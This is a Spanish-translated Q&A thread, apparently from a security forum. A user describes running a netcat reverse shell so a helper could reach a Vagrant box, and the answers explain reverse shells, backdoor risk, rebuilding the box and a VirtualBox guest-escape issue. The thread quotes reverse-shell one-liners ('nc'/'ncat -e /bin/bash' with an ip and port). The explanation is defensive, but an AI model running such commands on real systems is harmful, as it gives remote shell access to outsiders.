¿cómo se comporta la shell inversa?

15

Alguien me estaba ayudando con un problema en mi servidor vagrant. Pudo acceder al shell a través de (lo ejecuté para él, con su ip y puerto):

nc <ip> -e /bin/bash <port>

Nunca he encontrado esto antes, pero me pareció muy interesante.

Mi máquina host es Mac. ¿Podría él potencialmente obtener acceso a mi mac a través de vagrant guest?

Probablemente debería destruir y recrear el cuadro errante, ¿no?

    
pregunta schroeder 11.02.2016 - 23:01
fuente

3 respuestas

15

Supongo que quiso decir:

ncat -e /bin/bash <ip> <port>

El argumento -e inicia el comando /bin/bash cuando se establece una conexión. El comando luego se conecta a la IP y ejecuta bash para que el usuario remoto interactúe con él. El usuario remoto obtiene cualquier privilegio que tenga el usuario de lanzamiento. Una vez que este comando ha finalizado, también lo ha hecho la conexión. No hay problema para una conexión duradera allí.

BUT La pregunta real es lo que esa persona hizo en tu caja errante ... Podría tener configurar o instalar una puerta trasera, o algo más para tener una conexión persistente.

Puede revisar el archivo histórico de la sesión para ver qué hizo, o reconstruir el cuadro si no puede verificar sus acciones.

    
respondido por el schroeder 12.02.2016 - 00:13
fuente
9

Netcat es una herramienta de red básica para leer / escribir conexiones TCP / UDP. En el ejemplo que dio, le está diciendo que ejecute el programa especificado por -e a través de TCP a la máquina remota y al número de puerto. En ese caso particular, estaba enviando un shell bash a su máquina, presumiblemente donde tenía un oyente de netcat esperando.

Netcat es verdaderamente la navaja suiza de las redes. Puedes hacer mucho con eso. Usted puede:

  • crear proxies
  • chat
  • agarrar banners de servicio
  • escaneo de puertos
  • shell inverso
  • enlazar shell
  • utilízalo como un servidor web simple
  • transferir archivos a través de Internet

Es una herramienta inmensamente poderosa.

Para responder a tu pregunta sobre si él podría usarlo o no para acceder a tu mac: No lo hace en sí mismo. Tuviste que iniciar el shell inverso de nuevo a su caja Sin ti enviando el shell, él nunca podría conectarse. Sin embargo, después de conectarse, habría podido plantar una puerta trasera para un acceso persistente.

Un atacante con cualquier habilidad habría limpiado los registros de su sesión (y del sistema), por lo que ni siquiera puedes confiar en ellos para decir la verdad sobre lo que sucedió. Lo ÚNICO realmente seguro que puedes hacer es limpiar la caja.

    
respondido por el nyxgeek 12.02.2016 - 01:08
fuente
2

Se ha informado de una vulnerabilidad donde un atacante podría romper con Virtualbox guest a través de la aceleración 3D y obtener acceso al sistema operativo host.

Esto requiere que la aceleración 3D esté habilitada para el sistema operativo invitado.

    
respondido por el Kimmo Lehto 12.02.2016 - 09:09
fuente

Lea otras preguntas en las etiquetas